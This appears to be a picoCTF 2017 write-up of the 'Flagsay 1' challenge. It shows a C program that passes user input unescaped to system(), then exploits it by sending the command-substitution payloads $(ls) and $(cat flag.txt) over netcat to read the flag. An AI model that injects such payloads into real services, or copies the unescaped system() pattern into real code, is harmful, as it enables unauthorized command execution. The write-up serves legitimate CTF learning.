
Flagsay 1


Question

I heard you like flags, so now you can make your own! Exhilarating! Use flagsay-1! Source. Connect on shell2017.picoctf.com:20230.

HINTS

System will run exactly what the program gives it


Solution

After a long time, I saw an easy challenge. Once again we are given 2 files.

flagsay-1 flag-1.c

  1. Let's check what is written in the flag-1.c file.

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    // Byte offset into flag[] at which placeInFlag() starts writing user text.
    #define FIRSTCHAROFFSET 129
    // Number of characters placeInFlag() writes on a row before it wraps.
    #define LINELENGTH 35
    // Bytes placeInFlag() skips on each wrap to reach the next row's writable area.
    #define NEWLINEOFFSET 21
    // placeInFlag() stops writing once it has wrapped this many times.
    #define LINECOUNT 6
    
    // Not referenced anywhere in this listing.
    #define BUFFLEN 1024
    
    // Mutable ASCII-art banner. placeInFlag() overwrites part of it in place with
    // bytes that main() read from stdin, and main() then formats the whole array
    // into the command line it hands to system().
    char flag[] = "               _                                        \n"
    	          "              //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     \n"
    	          "             //                                   /     \n"
    	          "            //                                   /      \n"
    	          "           //                                   /       \n"
    	          "          //                                   /        \n"
    	          "         //                                   /         \n"
    	          "        //                                   /          \n"
    	          "       //___________________________________/           \n"
    	          "      //                                                \n"
    	          "     //                                                 \n"
    	          "    //                                                  \n"
    	          "   //                                                   \n"
    	          "  //                                                    \n"
    	          " //                                                     \n";
    
    // printf-style template for the command line that main() passes to system().
    // The %s sits inside shell double quotes. Double quotes do not stop the shell
    // from performing command substitution or variable expansion, so whatever
    // flag[] holds at format time is interpreted by the shell, not merely echoed.
    char commandBase[] = "/bin/echo \"%s\"\n";
    
    /*
     * Copy the NUL-terminated string `str` into the writable area of the global
     * banner `flag`, starting at FIRSTCHAROFFSET. LINELENGTH characters are
     * written per row; on reaching the end of a row the destination jumps ahead
     * by NEWLINEOFFSET bytes. Writing stops when `str` is exhausted or after
     * LINECOUNT wraps, so any excess input is silently dropped.
     *
     * The bytes are copied verbatim: nothing here filters or escapes shell
     * metacharacters, which matters because main() later embeds `flag` in a
     * command line executed by system().
     */
    void placeInFlag(char * str){
    	size_t left = strlen(str);
    	char *dst = flag + FIRSTCHAROFFSET;
    	char *rowEnd = dst + LINELENGTH;

    	for (size_t wraps = 0; left > 0 && wraps < LINECOUNT; ) {
    		if (dst != rowEnd) {
    			/* Still room on this row: copy one byte and advance. */
    			*dst++ = *str++;
    			left--;
    		} else {
    			/* Row is full: move both cursors to the next row. */
    			dst += NEWLINEOFFSET;
    			rowEnd += NEWLINEOFFSET + LINELENGTH;
    			wraps++;
    		}
    	}
    }
    
    
    
    /*
     * Reads one line from stdin, writes it into the banner with placeInFlag(),
     * then prints the banner by formatting it into commandBase ("/bin/echo ...")
     * and running the result with system(). argc and argv are unused.
     *
     * Security: this is an OS command injection sink (CWE-78). The stdin bytes
     * reach the shell unmodified inside a double-quoted argument, where command
     * substitution is still expanded, so the caller decides what the shell runs.
     * No shell is needed to print a string: writing flag[] directly with
     * fputs(flag, stdout) removes the sink entirely, which is more reliable than
     * trying to escape the input.
     */
    int main(int argc, char **argv){
    	size_t flagSize = strlen(flag) + 1; // +1 for the terminating NUL
    	// NOTE(review): malloc() result is used without a NULL check.
    	char * input = (char *)malloc(sizeof(char) * flagSize);
    	input[flagSize-1] = '\x0';
    	// Reads at most flagSize-1 bytes of untrusted input. The return value is
    	// not checked, so on EOF/error the buffer is still uninitialized heap
    	// memory when strchr() and placeInFlag() read it below.
    	fgets(input, flagSize, stdin);
    	// Strip the trailing newline that fgets() keeps, if one was read.
    	char * temp = strchr(input, '\n');
    	if(temp != NULL){
    		temp[0] = '\x0';
    	}
    	// Copies the untrusted line into the global banner without any filtering.
    	placeInFlag(input);
    
    	// Room for the banner plus the template text; NOTE(review): this malloc()
    	// result is also unchecked.
    	size_t commandLen = flagSize + strlen(commandBase) + 1;
    	char * command = (char *)malloc(sizeof(char) * commandLen);
    	// commandBase is a program-owned format string and flag is passed as the
    	// %s argument, so this is not a format-string bug; the problem is what
    	// happens to the resulting text on the next line.
    	snprintf(command, commandLen, commandBase, flag); 
    	// system() hands the string to the command interpreter, which expands
    	// any command substitution contained in the user-supplied banner text.
    	system(command);
    
    	free(input);
    	free(command);
    }

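    Now, as you can see, char commandBase[] = "/bin/echo \"%s\"\n"; is a shell command template: main() fills the %s with the flag banner (which now contains our input) and passes the result to system(), so the shell echoes back whatever we typed.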

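    So the input has to be a shell command, and it has to be wrapped in command substitution: our text ends up inside the double quotes of the echo command, where the shell prints it as plain text but still expands any command substitution. Either `` (backticks) or $() can be used; both are forms of command substitution.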

Let's try it out:

$nc shell2017.picoctf.com 20230
$(ls)
               _                                        
              //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
             //flagsay-1
flagsay-1_no_aslr
flag.txt
xinetd_wrapper.sh                              /     
            //                                   /      
           //                                   /       
          //                                   /        
         //                                   /         
        //                                   /          
       //___________________________________/           
      //                                                
     //                                                 
    //                                                  
   //                                                   
  //                                                    
 //                                                     


$nc shell2017.picoctf.com 20230
$(cat flag.txt)
               _                                        
              //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
             //3cd401c49122011a980e84a2c2180800   /     
            //                                   /      
           //                                   /       
          //                                   /        
         //                                   /         
        //                                   /          
       //___________________________________/           
      //                                                
     //                                                 
    //                                                  
   //                                                   
  //                                                    
 //                                                     

So, I think we got the flag: 3cd401c49122011a980e84a2c2180800.

Hope you liked it :)

~Thanks

@spiritedwolf